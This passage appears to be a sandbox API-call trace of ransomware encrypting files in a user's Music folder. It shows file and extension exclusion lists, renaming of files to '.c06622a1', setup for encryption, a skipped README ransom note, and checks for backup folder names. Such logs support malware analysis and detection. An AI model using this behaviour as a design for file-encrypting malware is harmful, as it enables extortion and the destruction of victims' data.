halpmcxz\\music\\k-ci7bu1asxti5iwzuur\\s7xgl3cvoffac-nawow.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\S7xgL3CvoffAc-naWOw.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur\\s7xgl3cvoffac-nawow.m4a.c06622a1"), dwFlags=0x8) returned 1 [0159.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\S7xgL3CvoffAc-naWOw.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur\\s7xgl3cvoffac-nawow.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e0 [0159.786] CreateIoCompletionPort (FileHandle=0x1e0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.786] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0159.793] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x36a3d4ca [0159.793] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6c42c5cd [0159.793] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7272e88b [0159.793] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x292cb5f0 [0159.793] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x71535c7f [0159.794] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x51eac45f [0159.794] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7404010 [0159.794] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1c4793f2 [0159.797] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x7c46789c [0159.797] RtlComputeCrc32 (PartialCrc=0x789c, Buffer=0x2b70094, Length=0x80) returned 0x1c08141c [0159.797] RtlComputeCrc32 (PartialCrc=0x141c, Buffer=0x2b70094, Length=0x80) returned 0xb6289d16 [0159.797] RtlComputeCrc32 (PartialCrc=0x9d16, Buffer=0x2b70094, Length=0x80) returned 0x25b7936 [0159.797] RtlComputeCrc32 (PartialCrc=0x7936, Buffer=0x2b70094, Length=0x80) returned 0x161ce91f [0159.797] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0159.797] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.797] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.797] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc61f8930, ftCreationTime.dwHighDateTime=0x1d5ddf1, ftLastAccessTime.dwLowDateTime=0xc7282850, ftLastAccessTime.dwHighDateTime=0x1d5dbbc, ftLastWriteTime.dwLowDateTime=0xc7282850, ftLastWriteTime.dwHighDateTime=0x1d5dbbc, nFileSizeHigh=0x0, nFileSizeLow=0x113be, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZS0z8d.mp3", cAlternateFileName="")) returned 1 [0159.797] _wcsicmp (_Str1="ZS0z8d.mp3", _Str2="README.c06622a1.TXT") returned 8 [0159.797] wcsstr (_Str="ZS0z8d.mp3", _SubStr="README") returned 0x0 [0159.797] _wcsicmp (_Str1="autorun.inf", _Str2="ZS0z8d.mp3") returned -25 [0159.797] wcslen (_String="autorun.inf") returned 0xb [0159.797] _wcsicmp (_Str1="boot.ini", _Str2="ZS0z8d.mp3") returned -24 [0159.797] wcslen (_String="boot.ini") returned 0x8 [0159.797] _wcsicmp (_Str1="bootfont.bin", _Str2="ZS0z8d.mp3") returned -24 [0159.797] wcslen (_String="bootfont.bin") returned 0xc [0159.798] _wcsicmp (_Str1="bootsect.bak", _Str2="ZS0z8d.mp3") returned -24 [0159.798] wcslen (_String="bootsect.bak") returned 0xc [0159.798] _wcsicmp (_Str1="desktop.ini", _Str2="ZS0z8d.mp3") returned -22 [0159.798] wcslen (_String="desktop.ini") returned 0xb [0159.798] _wcsicmp (_Str1="iconcache.db", _Str2="ZS0z8d.mp3") returned -17 [0159.798] wcslen (_String="iconcache.db") returned 0xc [0159.798] _wcsicmp (_Str1="ntldr", _Str2="ZS0z8d.mp3") returned -12 [0159.798] wcslen (_String="ntldr") returned 0x5 [0159.798] _wcsicmp (_Str1="ntuser.dat", _Str2="ZS0z8d.mp3") returned -12 [0159.798] wcslen (_String="ntuser.dat") returned 0xa [0159.798] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ZS0z8d.mp3") returned -12 [0159.798] wcslen (_String="ntuser.dat.log") returned 0xe [0159.798] _wcsicmp (_Str1="ntuser.ini", _Str2="ZS0z8d.mp3") returned -12 [0159.798] wcslen (_String="ntuser.ini") returned 0xa [0159.798] _wcsicmp (_Str1="thumbs.db", _Str2="ZS0z8d.mp3") returned -6 [0159.798] wcslen (_String="thumbs.db") returned 0x9 [0159.798] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0159.798] wcslen (_String="386") returned 0x3 [0159.798] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0159.798] wcslen (_String="adv") returned 0x3 [0159.798] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0159.798] wcslen (_String="ani") returned 0x3 [0159.798] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0159.798] wcslen (_String="bat") returned 0x3 [0159.798] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0159.798] wcslen (_String="bin") returned 0x3 [0159.799] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0159.799] wcslen (_String="cab") returned 0x3 [0159.799] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0159.799] wcslen (_String="cmd") returned 0x3 [0159.799] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0159.799] wcslen (_String="com") returned 0x3 [0159.799] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0159.799] wcslen (_String="cpl") returned 0x3 [0159.799] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0159.799] wcslen (_String="cur") returned 0x3 [0159.799] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0159.799] wcslen (_String="deskthemepack") returned 0xd [0159.799] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0159.799] wcslen (_String="diagcab") returned 0x7 [0159.799] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0159.799] wcslen (_String="diagcfg") returned 0x7 [0159.799] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0159.799] wcslen (_String="diagpkg") returned 0x7 [0159.799] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0159.799] wcslen (_String="dll") returned 0x3 [0159.799] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0159.799] wcslen (_String="drv") returned 0x3 [0159.799] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0159.799] wcslen (_String="exe") returned 0x3 [0159.800] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0159.800] wcslen (_String="hlp") returned 0x3 [0159.800] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0159.800] wcslen (_String="icl") returned 0x3 [0159.800] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0159.800] wcslen (_String="icns") returned 0x4 [0159.800] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0159.800] wcslen (_String="ico") returned 0x3 [0159.800] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0159.800] wcslen (_String="ics") returned 0x3 [0159.800] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0159.800] wcslen (_String="idx") returned 0x3 [0159.800] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0159.800] wcslen (_String="ldf") returned 0x3 [0159.800] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0159.800] wcslen (_String="lnk") returned 0x3 [0159.800] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0159.800] wcslen (_String="mod") returned 0x3 [0159.800] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0159.800] wcslen (_String="mpa") returned 0x3 [0159.800] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0159.800] wcslen (_String="msc") returned 0x3 [0159.800] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0159.800] wcslen (_String="msp") returned 0x3 [0159.800] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0159.800] wcslen (_String="msstyles") returned 0x8 [0159.800] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0159.800] wcslen (_String="msu") returned 0x3 [0159.801] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0159.801] wcslen (_String="nls") returned 0x3 [0159.801] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0159.801] wcslen (_String="nomedia") returned 0x7 [0159.801] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0159.801] wcslen (_String="ocx") returned 0x3 [0159.801] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0159.801] wcslen (_String="prf") returned 0x3 [0159.801] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0159.801] wcslen (_String="ps1") returned 0x3 [0159.801] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0159.801] wcslen (_String="rom") returned 0x3 [0159.801] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0159.801] wcslen (_String="rtp") returned 0x3 [0159.801] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0159.801] wcslen (_String="scr") returned 0x3 [0159.801] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0159.801] wcslen (_String="shs") returned 0x3 [0159.801] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0159.801] wcslen (_String="spl") returned 0x3 [0159.801] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0159.801] wcslen (_String="sys") returned 0x3 [0159.801] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0159.801] wcslen (_String="theme") returned 0x5 [0159.801] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0159.801] wcslen (_String="themepack") returned 0x9 [0159.802] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0159.802] wcslen (_String="wpx") returned 0x3 [0159.802] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0159.802] wcslen (_String="lock") returned 0x4 [0159.802] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0159.802] wcslen (_String="key") returned 0x3 [0159.802] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0159.802] wcslen (_String="hta") returned 0x3 [0159.802] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0159.802] wcslen (_String="msi") returned 0x3 [0159.802] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0159.802] wcslen (_String="pdb") returned 0x3 [0159.802] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0159.802] wcslen (_String="sqlite") returned 0x6 [0159.802] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur")) returned 0x10 [0159.802] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.802] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR" [0159.802] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR") returned 0x3c [0159.802] wcscpy (in: _Dest=0x32400da, _Source="ZS0z8d.mp3" | out: _Dest="ZS0z8d.mp3") returned="ZS0z8d.mp3" [0159.802] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\ZS0z8d.mp3", dwFileAttributes=0x80) returned 1 [0159.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\ZS0z8d.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur\\zs0z8d.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0159.803] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.803] ReadFile (in: hFile=0x1a4, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0159.804] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x47a6d259 [0159.804] RtlComputeCrc32 (PartialCrc=0xd259, Buffer=0x32e9a4, Length=0x80) returned 0xcff8f643 [0159.804] RtlComputeCrc32 (PartialCrc=0xf643, Buffer=0x32e9a4, Length=0x80) returned 0xf3e20644 [0159.804] RtlComputeCrc32 (PartialCrc=0x644, Buffer=0x32e9a4, Length=0x80) returned 0xf9bb8568 [0159.805] RtlComputeCrc32 (PartialCrc=0x8568, Buffer=0x32e9a4, Length=0x80) returned 0x5573e6e5 [0159.805] CloseHandle (hObject=0x1a4) returned 1 [0159.805] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.805] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\ZS0z8d.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\ZS0z8d.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\ZS0z8d.mp3" [0159.805] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\ZS0z8d.mp3") returned 0x47 [0159.805] wcscpy (in: _Dest=0x32500f6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.805] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\ZS0z8d.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur\\zs0z8d.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\ZS0z8d.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur\\zs0z8d.mp3.c06622a1"), dwFlags=0x8) returned 1 [0159.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k-cI7bu1aSXti5iWZuUR\\ZS0z8d.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k-ci7bu1asxti5iwzuur\\zs0z8d.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a4 [0159.808] CreateIoCompletionPort (FileHandle=0x1a4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0159.808] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3480020 [0159.816] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x33275af1 [0159.816] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x480e06f4 [0159.816] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x463445ae [0159.816] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x714499 [0159.816] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x289a21cf [0159.816] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x270281dd [0159.816] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2f798bc [0159.816] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x363e0515 [0159.819] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3480094, Length=0x80) returned 0x25c0584 [0159.819] RtlComputeCrc32 (PartialCrc=0x584, Buffer=0x3480094, Length=0x80) returned 0x78954876 [0159.819] RtlComputeCrc32 (PartialCrc=0x4876, Buffer=0x3480094, Length=0x80) returned 0xab056990 [0159.819] RtlComputeCrc32 (PartialCrc=0x6990, Buffer=0x3480094, Length=0x80) returned 0x981ca8c3 [0159.819] RtlComputeCrc32 (PartialCrc=0xa8c3, Buffer=0x3480094, Length=0x80) returned 0xf69ff7eb [0159.819] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0159.819] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.819] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.819] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.819] FindClose (in: hFindFile=0x154188 | out: hFindFile=0x154188) returned 1 [0159.819] _wcsicmp (_Str1="backup", _Str2="k-cI7bu1aSXti5iWZuUR") returned -9 [0159.819] wcslen (_String="backup") returned 0x6 [0159.820] _wcsicmp (_Str1="bak", _Str2="k-cI7bu1aSXti5iWZuUR") returned -9 [0159.820] wcslen (_String="bak") returned 0x3 [0159.820] _wcsicmp (_Str1="back", _Str2="k-cI7bu1aSXti5iWZuUR") returned -9 [0159.820] wcslen (_String="back") returned 0x4 [0159.820] _wcsicmp (_Str1="archive", _Str2="k-cI7bu1aSXti5iWZuUR") returned -10 [0159.820] wcslen (_String="archive") returned 0x7 [0159.820] _wcsicmp (_Str1="bckp", _Str2="k-cI7bu1aSXti5iWZuUR") returned -9 [0159.820] wcslen (_String="bckp") returned 0x4 [0159.820] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0159.821] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0159.822] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cc66e40, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8cc66e40, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8cc66e40, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0159.822] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0159.822] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x642412a0, ftCreationTime.dwHighDateTime=0x1d5e760, ftLastAccessTime.dwLowDateTime=0x563bd0a0, ftLastAccessTime.dwHighDateTime=0x1d5e04a, ftLastWriteTime.dwLowDateTime=0x563bd0a0, ftLastWriteTime.dwHighDateTime=0x1d5e04a, nFileSizeHigh=0x0, nFileSizeLow=0x103ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXAoeYh76KLw3RlgqbnC.mp3", cAlternateFileName="TXAOEY~1.MP3")) returned 1 [0159.822] _wcsicmp (_Str1="TXAoeYh76KLw3RlgqbnC.mp3", _Str2="README.c06622a1.TXT") returned 2 [0159.822] wcsstr (_Str="TXAoeYh76KLw3RlgqbnC.mp3", _SubStr="README") returned 0x0 [0159.822] _wcsicmp (_Str1="autorun.inf", _Str2="TXAoeYh76KLw3RlgqbnC.mp3") returned -19 [0159.822] wcslen (_String="autorun.inf") returned 0xb [0159.822] _wcsicmp (_Str1="boot.ini", _Str2="TXAoeYh76KLw3RlgqbnC.mp3") returned -18 [0159.822] wcslen (_String="boot.ini") returned 0x8 [0159.822] _wcsicmp (_Str1="bootfont.bin", _Str2="TXAoeYh76KLw3RlgqbnC.mp3") returned -18 [0159.822] wcslen (_String="bootfont.bin") returned 0xc [0159.822] _wcsicmp (_Str1="bootsect.bak", _Str2="TXAoeYh76KLw3RlgqbnC.mp3") returned -18 [0159.822] wcslen (_String="bootsect.bak") returned 0xc [0159.822] _wcsicmp (_Str1="desktop.ini", _Str2="TXAoeYh76KLw3RlgqbnC.mp3") returned -16 [0159.822] wcslen (_String="desktop.ini") returned 0xb [0159.822] _wcsicmp (_Str1="iconcache.db", _Str2="TXAoeYh76KLw3RlgqbnC.mp3") returned -11 [0159.822] wcslen (_String="iconcache.db") returned 0xc [0159.822] _wcsicmp (_Str1="ntldr", _Str2="TXAoeYh76KLw3RlgqbnC.mp3") returned -6 [0159.822] wcslen (_String="ntldr") returned 0x5 [0159.822] _wcsicmp (_Str1="ntuser.dat", _Str2="TXAoeYh76KLw3RlgqbnC.mp3") returned -6 [0159.822] wcslen (_String="ntuser.dat") returned 0xa [0159.823] _wcsicmp (_Str1="ntuser.dat.log", _Str2="TXAoeYh76KLw3RlgqbnC.mp3") returned -6 [0159.823] wcslen (_String="ntuser.dat.log") returned 0xe [0159.823] _wcsicmp (_Str1="ntuser.ini", _Str2="TXAoeYh76KLw3RlgqbnC.mp3") returned -6 [0159.823] wcslen (_String="ntuser.ini") returned 0xa [0159.823] _wcsicmp (_Str1="thumbs.db", _Str2="TXAoeYh76KLw3RlgqbnC.mp3") returned -16 [0159.823] wcslen (_String="thumbs.db") returned 0x9 [0159.823] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0159.823] wcslen (_String="386") returned 0x3 [0159.823] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0159.823] wcslen (_String="adv") returned 0x3 [0159.823] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0159.823] wcslen (_String="ani") returned 0x3 [0159.823] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0159.823] wcslen (_String="bat") returned 0x3 [0159.823] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0159.823] wcslen (_String="bin") returned 0x3 [0159.823] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0159.823] wcslen (_String="cab") returned 0x3 [0159.823] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0159.823] wcslen (_String="cmd") returned 0x3 [0159.823] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0159.823] wcslen (_String="com") returned 0x3 [0159.823] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0159.823] wcslen (_String="cpl") returned 0x3 [0159.823] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0159.823] wcslen (_String="cur") returned 0x3 [0159.823] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0159.823] wcslen (_String="deskthemepack") returned 0xd [0159.823] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0159.823] wcslen (_String="diagcab") returned 0x7 [0159.823] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0159.823] wcslen (_String="diagcfg") returned 0x7 [0159.823] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0159.823] wcslen (_String="diagpkg") returned 0x7 [0159.824] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0159.824] wcslen (_String="dll") returned 0x3 [0159.824] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0159.824] wcslen (_String="drv") returned 0x3 [0159.824] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0159.824] wcslen (_String="exe") returned 0x3 [0159.824] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0159.824] wcslen (_String="hlp") returned 0x3 [0159.824] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0159.824] wcslen (_String="icl") returned 0x3 [0159.824] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0159.824] wcslen (_String="icns") returned 0x4 [0159.824] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0159.824] wcslen (_String="ico") returned 0x3 [0159.824] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0159.824] wcslen (_String="ics") returned 0x3 [0159.824] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0159.824] wcslen (_String="idx") returned 0x3 [0159.824] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0159.824] wcslen (_String="ldf") returned 0x3 [0159.824] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0159.824] wcslen (_String="lnk") returned 0x3 [0159.824] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0159.824] wcslen (_String="mod") returned 0x3 [0159.824] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0159.824] wcslen (_String="mpa") returned 0x3 [0159.824] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0159.824] wcslen (_String="msc") returned 0x3 [0159.824] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0159.824] wcslen (_String="msp") returned 0x3 [0159.824] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0159.824] wcslen (_String="msstyles") returned 0x8 [0159.824] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0159.824] wcslen (_String="msu") returned 0x3 [0159.825] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0159.825] wcslen (_String="nls") returned 0x3 [0159.825] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0159.825] wcslen (_String="nomedia") returned 0x7 [0159.825] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0159.825] wcslen (_String="ocx") returned 0x3 [0159.825] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0159.825] wcslen (_String="prf") returned 0x3 [0159.825] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0159.825] wcslen (_String="ps1") returned 0x3 [0159.825] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0159.825] wcslen (_String="rom") returned 0x3 [0159.825] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0159.825] wcslen (_String="rtp") returned 0x3 [0159.825] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0159.825] wcslen (_String="scr") returned 0x3 [0159.825] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0159.825] wcslen (_String="shs") returned 0x3 [0159.825] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0159.825] wcslen (_String="spl") returned 0x3 [0159.825] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0159.825] wcslen (_String="sys") returned 0x3 [0159.825] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0159.825] wcslen (_String="theme") returned 0x5 [0159.825] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0159.825] wcslen (_String="themepack") returned 0x9 [0159.825] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0159.825] wcslen (_String="wpx") returned 0x3 [0159.825] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0159.825] wcslen (_String="lock") returned 0x4 [0159.825] 